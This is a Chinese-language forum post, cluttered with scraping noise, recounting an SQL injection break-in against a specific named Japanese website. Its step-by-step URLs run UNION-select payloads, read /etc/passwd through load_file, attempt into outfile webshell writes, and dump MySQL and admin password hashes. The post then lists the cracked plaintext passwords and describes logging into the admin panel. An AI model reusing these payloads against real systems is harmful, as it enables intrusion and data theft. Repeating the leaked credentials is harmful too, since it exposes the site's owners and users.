|
|
9 Z" X& w# y5 A
# h" |% |& q1 h* E- v! ]0 U
0x01. 检测 www.zuaa.jp 收集数据
. m# t" `) j4 a, w) j9 h* I3 s; C- r* _: N1 Z
; D& Q" f1 C4 k+ }$ E% \+ Vwhatweb: p5 w) a. l3 m+ c
w- C! y6 M) ?4 t, }5 P! t( t3 ~
# P" z$ z/ M P# L0 f利用NMAP扫描5 h( V9 S6 n& [4 d4 m) A2 K" Y
0 r, E$ C. U$ n9 n; I中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
& ~. t f7 ?7 ~" e% W, a0x02.找注入点
5 p' A; b: a# h. e' z; t+ P2 E: N2 J找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
- P. l6 i% A2 F! P0 v
Q" T* r, h7 k% F, |* b1 |+ h, I. g6 z
0x03.order by
7 `0 P" G$ [5 c7 Y: K2 x5 r2 } http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
+ m5 R' Z" n& K$ T! B4 Z, f' e+ v2 H C
order by 28报错,order by 27正常
% x' G# r. D+ w0 `# T3 V$ C: u; N
0x04. union手动查询" F* c& h# g6 E
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
* N" m( S& f" s0 h. J添加到 27 时正常显示
9 c: X2 X; s t2 S. M4 b% l
3 \# p7 A* B( F* I3 ]" l中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持- L% A5 ]% x' l- T9 n5 e
9 x8 X. E2 c4 q5 C- ]0 d5 Y4 P0x05. info:
& J* ]) H- b6 bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + I6 J2 Y3 H; [: h, i
+ H+ g$ k/ e+ Y6 A
user: root@localhost
" W+ e' v$ X6 v$ Idatabase: openpne1 b, w$ r! X- L: B# ~
version: 4.1.22; x8 j1 a, M+ f
os: portbld-freebsd5.49 Y- ^4 m. a3 u* j E3 s, E1 P' i
) s/ e, l8 S) ^" \- `
0x06. root用户- L8 o$ m* j- ^* l8 W
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
3 N% f& S) G: z' Z* U, rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
c" ?/ B& p! a' f) C$ s2 _7 J2 U
9 \9 n5 L. S: x) i8 I; o通过工具转换0 G1 H g) h0 U* } U3 h
9 M" L( k) E4 T5 i
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持/ |7 }0 k2 ?; K' H% c% m1 @
, X/ r. H& K1 R( d, e9 M8 q
0x07. 利用 into outfile
- C$ `1 L( @4 H- p1 J, T5 a全部都失败) h5 G4 ?) p8 p! n/ U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
0 H# ?5 u( r$ d) B9 d5 C2 |, b4 r
. l8 [; t4 V7 U* y6 t, g8 V( fhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
* f. D6 A7 x, L, _$ q7 e
0 x( x5 J! s" }: h9 G页面显示“MDB2 Error:syntax error”! s2 }3 {; E! Z8 w
1 q8 x& r6 @5 z' G) ~6 G8 m0 Q
0x08. 利用 mysql 4.1
K6 ^. ?7 i( m& z; ~9 `猜常规表名,字段未果 工具 sqlmap
/ ]; {6 ~: w$ G- l中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持. j5 m0 P# `( m! W# j8 W7 G( u
' H& U# W& E8 A( s" Z" Z8 z
" ~( c( k" B( y0 f' b- z# @6 j* G; b( H2 T
0x09. 查找后台: ]0 _% W' R0 b" {" h
利用 现有的各种 后台工具尝试都不行/ M" O8 r5 G! c# v
4 _- k" S% u7 e
0x10. MySL外联方法
% B9 D8 v* u1 P- p从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
" D' B* }; x5 {. Y可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user0 u6 R/ C2 j* d9 i: p0 b q8 b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user% M: h+ g1 ]4 ?# i( e! P
( Q2 r2 u1 e, k* a
这个可以在 www.cmd5.com 解密% n4 @+ [' O4 A" X' O9 P1 c
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20097 u6 X i+ i! _7 k& i" @
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
5 t1 a4 r2 L5 H" R% xopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( F6 l' B$ E7 z/ Hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
6 S) s% y. `) d, J工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知! f4 o8 W; Y# Z' R0 N5 M1 x( A1 P
- M3 }4 ^" n- e3 O
/ G. [4 w1 `3 J! Y' u& J% k0 e0x11. 网站突破) ]) I2 `( w( B0 q7 c9 J, B
发现网站的源程序 openpne, google 下载 openpne 源码
: X; G# N( W# Q( n( Y
$ B& ?. V3 t s* R7 b( q9 o6 w0 m
0x12. 默认信息利用* ^! y# X- U6 x& S. s
http://sns.zuaa.jp/?m=admin&a=page_login
' W4 i: w- T$ C" V. G, p6 s& f) i6 a1 w; R! _
表名 (c_admin_user) ,字段名(username,password)
: w0 c) F+ \* W1 shttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user# i9 X' E j5 t5 [4 ?' c
: E9 p( u1 _2 X8 v# y: ]
解密' p- R L4 J- `
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009' p. ~1 U$ N- o
zuaajp:c0923ec5857796a393da99905008c176, zju1897
( p+ d& e0 d+ g. a g* C: f; Z) f/ f3 V( n# D
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
3 }! }, k1 z0 ^& J8 x( w6 b8 Z" @9 K8 f9 s5 t6 A( P
0x13. 登录后台
# l& M A5 [' X9 {9 f( |9 d: t/ D8 E8 F- H4 x" q, s
# q* P% Y6 |0 g) O0 Y$ V0 e
3 u+ u2 `; t8 V" W0 J0x14. 小结
; S! l# B5 ?* U1 N. q* S) P利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。: B# d* B& r0 l" f2 z
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点7 G8 V8 V; G1 ]% b
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
% E+ T' z3 ?, _1 x' J$ H中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
# ?' j9 P; K& u/ V2 g/ S7 c5 l( V0 F/ {% c$ @5 @. F
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!% b& o& [- K8 E0 j: ~$ u# Y+ X
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|